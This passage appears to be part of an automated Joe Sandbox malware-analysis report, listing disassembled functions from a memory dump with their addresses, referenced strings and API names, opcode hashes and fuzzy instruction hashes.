                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 1766c72f6afa6d3d41ca1c3b069dee6dbbf7908562ba01f3ce4b09234fae9676
                                                          • Instruction ID: d0c1b6ddb382eab36769a3766e57fefa03f58e0af127dde9a16f63b8760d8b57
                                                          • Opcode Fuzzy Hash: 1766c72f6afa6d3d41ca1c3b069dee6dbbf7908562ba01f3ce4b09234fae9676
                                                          • Instruction Fuzzy Hash: 16B100B56093808FD354CF28C580A6ABBF1BF88304F544A6EF899DB352D771E945CB82
                                                          Function 35927370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fa1eeea6a7587d9bab5f8c68491c1431d9e620cb982c977d501028b1f67a9e0
                                                          • Instruction ID: 8e72123341a6c737397b77b2f0e68a636dbba616442a416a75498d75f03fbe10
                                                          • Opcode Fuzzy Hash: 2fa1eeea6a7587d9bab5f8c68491c1431d9e620cb982c977d501028b1f67a9e0
                                                          • Instruction Fuzzy Hash: D9A14775608346CFD310CF28D880A1ABBFAFF88354F14496EE585AB355EB70E945CB92
                                                          Function 35927703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62f87c00c4696d439bd5c5a0accd2c5433e4886cb083a48cc4987d904929c41c
                                                          • Instruction ID: 1b8fe7f114c4fa27f4c6e901318d2685f9ce6472e47425c95bd59e083c92c7d1
                                                          • Opcode Fuzzy Hash: 62f87c00c4696d439bd5c5a0accd2c5433e4886cb083a48cc4987d904929c41c
                                                          • Instruction Fuzzy Hash: 08614375B05609EFDB08CF68C880A9DFBB6BF88240F14816AD419A7305DB74BA45CBD0
                                                          Function 3595F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c01b2e973eb8b5bab2d04d9263c503649955b4f3a6be65a3c39232692c9ba330
                                                          • Instruction ID: a2cae423d42c2fd025919af63ddd5f14f28f04e8ca703f74c991c9389c5ef758
                                                          • Opcode Fuzzy Hash: c01b2e973eb8b5bab2d04d9263c503649955b4f3a6be65a3c39232692c9ba330
                                                          • Instruction Fuzzy Hash: 2D412DB4D11388DFDB10CFA9C480AADBBF8FB48350F50456ED859A7211DB309A55DF60
                                                          Function 3591B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 6a2906483af9810bd4cc89ab9ed8853ea74c6e6b472a2a3b2890311253f2d0ac
                                                          • Instruction ID: e276aa9cf003ad8977a8c887c1500af3e18405c83b290bac73bb04f22ee38852
                                                          • Opcode Fuzzy Hash: 6a2906483af9810bd4cc89ab9ed8853ea74c6e6b472a2a3b2890311253f2d0ac
                                                          • Instruction Fuzzy Hash: 0131D176601318AFC711DF18C840A5A77BBBF493A0F548269ED559B2A1DB31EE42CBD0
                                                          Function 359257C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 27b2de50c86253544a483eec608bc172ab02a59de54716d71188bb28ea84ca7a
                                                          • Instruction ID: 57b06b0d2924610e6801f52227074008eafe982745f8dcb853b1fe9b5c43f5e3
                                                          • Opcode Fuzzy Hash: 27b2de50c86253544a483eec608bc172ab02a59de54716d71188bb28ea84ca7a
                                                          • Instruction Fuzzy Hash: D9316936715A09FFE7558B24DA80E89BBB6FF48240F445025E8018BB51DB79F831CB80
                                                          Function 35923616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 16ddfd17bc598c5d06f52d39f500aa20923b49e378c83795bd5117202ffac3d1
                                                          • Instruction ID: bced80c5e7023ce19ab242f9bf423ef83e649a6d61de273cb66cec930c888295
                                                          • Opcode Fuzzy Hash: 16ddfd17bc598c5d06f52d39f500aa20923b49e378c83795bd5117202ffac3d1
                                                          • Instruction Fuzzy Hash: 4421313520A3589FDB218F04C985F5ABBBEFF88B10F414568EC414BA59CB70E904CBC1
                                                          Function 359192FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 3b76a83cdfbbf6c2b65c4002fee7647f01f2280502dd7952d8547569602ad9eb
                                                          • Instruction ID: 6e1485a32078afa614007bc2ae2b3435960679b55a355fddf18b0d35238c4359
                                                          • Opcode Fuzzy Hash: 3b76a83cdfbbf6c2b65c4002fee7647f01f2280502dd7952d8547569602ad9eb
                                                          • Instruction Fuzzy Hash: 1CF0F032204344AFD7319B09CC08F8ABBFDEF84B40F180118E94293091C6A0BA06C650
                                                          Function 3592973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                          • Instruction ID: 10bdf30d3017b70dcbfac6298eea74ac2958e7b03654acd23c28fcc9cba1beb3
                                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                          • Instruction Fuzzy Hash: 99617AB5D0521DAFEF11CFA5C840B9EBBB8FF84754F144129E811BB294D7789A44CBA0
                                                          Function 359AF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                          • Instruction ID: 29f70b2564b3438cf2a0bad4ce9124458bb84ff2432f20b14aa202f962899834
                                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                          • Instruction Fuzzy Hash: FE517CB6619705AFE7218F54C840F5AB7ECFF84794F400929B9819B290E7B4ED08CBA1
                                                          Function 3591B136 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: {v$s(
                                                          • API String ID: 0-144160112
                                                          • Opcode ID: 0b6509b83c6fc45fb9d3d56ff2c107f8c3d57f28152dbc2808f1d504c94aac15
                                                          • Instruction ID: 0cd8100609cf85a209024e2f8f96c9bf5311a9e5fc0718adf8432d1e9bd86488
                                                          • Opcode Fuzzy Hash: 0b6509b83c6fc45fb9d3d56ff2c107f8c3d57f28152dbc2808f1d504c94aac15
                                                          • Instruction Fuzzy Hash: C941AEB1641315EFE722DF64C840B0ABBBAFF04790F014869E9159F261DBB0EA04CB90
                                                          Function 359DB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PreferredUILanguages
                                                          • API String ID: 0-1884656846
                                                          • Opcode ID: c113910ad7eeda57435466272b639204b896522e5878e9f804a70d90400bb909
                                                          • Instruction ID: 48427a53a58200994fe27291736345b6ab8a47c50d83b7822cbb0cb09998168b
                                                          • Opcode Fuzzy Hash: c113910ad7eeda57435466272b639204b896522e5878e9f804a70d90400bb909
                                                          • Instruction Fuzzy Hash: BE419F76E05219ABDF11CE94C840AEEF7FEEF44750F418166EC05A7250DA74EE40DBA0
                                                          Function 359A97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: verifier.dll
                                                          • API String ID: 0-3265496382
                                                          • Opcode ID: 10e76e95c47c6465807fa6d6499bc80136f5d7f5f495e680ddba13dfd03ff574
                                                          • Instruction ID: 27eb80f7ba23e695ef359b5f77a673296b696e33b4c47c5dbc1e47864696df51
                                                          • Opcode Fuzzy Hash: 10e76e95c47c6465807fa6d6499bc80136f5d7f5f495e680ddba13dfd03ff574
                                                          • Instruction Fuzzy Hash: 493181BA710302AFD7148F6DD850A2677FDFB4C750F91806AE9059F381EA35C9819BA0
                                                          Function 35957505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                          • Instruction ID: 8fa9aa80a1c3fcf8f9430b3ef58800222dce3c9f6f9364654814953f035d44ea
                                                          • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                          • Instruction Fuzzy Hash: 4E41B4B9A00616EBDB25CF44C890FBEB7B9FF447A1F40445AE94597200DB30DA52CBE1
                                                          Function 35925096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx
                                                          • API String ID: 0-89312691
                                                          • Opcode ID: 8f6a7a4ce20f797b30276f396b8c13df05a0bb26331198589ddb3bdf9f948478
                                                          • Instruction ID: 10dc049848aaab054ad492499f23c97b5bef0c67dc6ee1f4dba330e98254bc38
                                                          • Opcode Fuzzy Hash: 8f6a7a4ce20f797b30276f396b8c13df05a0bb26331198589ddb3bdf9f948478
                                                          • Instruction Fuzzy Hash: A311B67438A70A8FF7248919DC50616739AFB85364F34852AE855CF399EBB1DC41C382
                                                          Function 359A106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrCreateEnclave
                                                          • API String ID: 0-3262589265
                                                          • Opcode ID: fffdf25dfbe1a18302049161df8cbe035c5d6e4a2dc432c1b8f8dc23f9428215
                                                          • Instruction ID: 8dc57cb183d737712d5068679402c7c3adf92c1add56c49dbc4be219884bec05
                                                          • Opcode Fuzzy Hash: fffdf25dfbe1a18302049161df8cbe035c5d6e4a2dc432c1b8f8dc23f9428215
                                                          • Instruction Fuzzy Hash: 6721EFB6A183849FC310CF2A8944A5BFBE8FBD5B50F404A1FF99497250DBB09505DBA2
                                                          Function 3597739A Relevance: .7, Instructions: 705COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 203c74ca71fbb4fead0ebd868bb592166f7308e2e9426409841e88fec0f7eb8c
                                                          • Instruction ID: 8f012ac4d60c512e34d8ba5ddaac774f976f44b1be6388d73ef7445f06062d2d
                                                          • Opcode Fuzzy Hash: 203c74ca71fbb4fead0ebd868bb592166f7308e2e9426409841e88fec0f7eb8c
                                                          • Instruction Fuzzy Hash: 4742B075B046168FEB19CF59C880AAEB7F6FF88354F14856ED452AB350DB34E842CB90
                                                          Function 3594B2C0 Relevance: .6, Instructions: 629COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0aa8fe52bdd2eb204c8468943d4721a92ee6f7e7f16a4e0fbb34bc6588498cc7
                                                          • Instruction ID: e2a1466cd685ae5300e2406c3495f213ed442c0f0c87e3542e71050737fdb191
                                                          • Opcode Fuzzy Hash: 0aa8fe52bdd2eb204c8468943d4721a92ee6f7e7f16a4e0fbb34bc6588498cc7
                                                          • Instruction Fuzzy Hash: 5532A0B6E05219DBDF14CFA8C890BAEBBB6FF44754F140029E805AB391EB359D11CB91
                                                          Function 359E16CC Relevance: .6, Instructions: 571COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1c580b5d34469cd38ae84c0695c74f42931858de0a0f2c2ed63f90b3184dc06
                                                          • Instruction ID: 68d80e51ca1294e7e942499f9b418a2514cb1fe009bb9fbd57132e15d0954631
                                                          • Opcode Fuzzy Hash: b1c580b5d34469cd38ae84c0695c74f42931858de0a0f2c2ed63f90b3184dc06
                                                          • Instruction Fuzzy Hash: 4B22BF79B002568FDB0ACF58C490AAEF7B6BF89314F24456DD852EB345DB30E942DB90
                                                          Function 3592D7E0 Relevance: .3, Instructions: 342COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0789c66e39d61bdfee50b6a0a4ac46d192808bc4b9aed31e6c5018d09d2af7e7
                                                          • Instruction ID: 41783046e33207ffd93e595ae98e7a9714d7cb842fa7c377525c969a9ffccfbd
                                                          • Opcode Fuzzy Hash: 0789c66e39d61bdfee50b6a0a4ac46d192808bc4b9aed31e6c5018d09d2af7e7
                                                          • Instruction Fuzzy Hash: FEC11275E0430ADFEB14CF58C940BAEB7BAFF54354F158268D819AB284D774E942CB80
                                                          Function 3593F460 Relevance: .3, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9a4d6afdec0517603500b228108a6746b41a0b1c63fb7cde0eab383f17f96a0
                                                          • Instruction ID: 49b217b2c487e3ca570041040ec357f1c4edfc7212a78971478970972e8eb3cd
                                                          • Opcode Fuzzy Hash: f9a4d6afdec0517603500b228108a6746b41a0b1c63fb7cde0eab383f17f96a0
                                                          • Instruction Fuzzy Hash: 66C13276A06329CBEB14CF18C596B7973B6FF48708F15416AEC429F3A1DB788941CB90
                                                          Function 359490DB Relevance: .3, Instructions: 287COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 530ef9ebc224f3bc6478cc9520edbad6511c4b94db25a9499c9c02fc216b2e75
                                                          • Instruction ID: 009e55e2d090806b25d8dd33ad96160e459bfcca3a4f9c67a1d23e3ec07f73bf
                                                          • Opcode Fuzzy Hash: 530ef9ebc224f3bc6478cc9520edbad6511c4b94db25a9499c9c02fc216b2e75
                                                          • Instruction Fuzzy Hash: F0A139B2A04719AFEB12CF64CC81FAE77B9AF49754F410054F900AB2A0D779ED15CBA0
                                                          Function 359CB550 Relevance: .3, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                          • Instruction ID: b36e3ee9c1c54657b47856084a1d454d40409155a8e461f2d35a71d493ec342c
                                                          • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
